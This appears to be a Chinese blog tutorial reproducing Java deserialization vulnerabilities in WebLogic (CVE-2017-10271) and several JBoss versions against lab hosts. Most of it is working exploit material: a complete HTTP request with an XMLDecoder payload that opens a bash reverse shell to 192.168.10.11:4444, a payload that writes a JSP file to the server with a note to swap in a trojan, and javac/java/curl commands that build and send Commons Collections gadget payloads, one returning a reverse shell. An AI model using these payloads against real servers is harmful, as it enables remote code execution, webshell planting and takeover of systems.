JAVA反序列化漏洞复现

时间  2019-12-10 标签 java 序列 漏洞 复现

目录html

Weblogic反序列化漏洞java

Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)web

JBOSS反序列化漏洞shell

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)安全

JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)bash

JBoss JMXInvokerServlet 反序列化漏洞服务器

Weblogic反序列化漏洞

Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程当中出现反序列化漏洞,致使可执行任意命令。app

这个漏洞利用工具是 javaexec.exe ,也能够像以下手动发送数据。curl

向存在漏洞的服务器发送的数据jsp

反弹shell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.13:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 642

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.11/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

写入木马文件

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>       //将这一行的数据换成木马的
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

参考文章:Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) 

JBOSS反序列化漏洞

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及以前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

这个漏洞利用工具是 JavaDeserH2HC 和 javaexec.exe 。

咱们先将其发送到kali上,解压,进入该目录。而后执行下列命令

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"   #该命令会生成ExampleCommonsCollections1WithHashMap.ser文件

curl http://192.168.10.13:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser  #将该文件做为body发送

咱们执行的是 touch  /tmp/success 命令,咱们进入漏洞服务器,查看,在 /tmp 目录下新建了success目录。

参考文章:JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的状况下尝试未来自客户端的数据流进行反序列化,从而致使了漏洞。

这个漏洞利用工具是 JavaDeserH2HC 、jboss反序列化_CVE-2017-12149.jar 和 javaexec.exe。

下载该工具,上传到Kali,解压,进入目录。执行下面几条命令,便可从目标服务器反弹shell。

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.10.11:4444
curl http://192.168.10.13:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

或者直接利用图形化工具执行命令,可是这个不能反弹shell

JBoss JMXInvokerServlet 反序列化漏洞

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,而后咱们利用Apache Commons Collections中的Gadget执行任意代码。

这个漏洞利用工具是 javaexec.exe 。

本文章全部工具:

联系我们 沪ICP备13005482号-10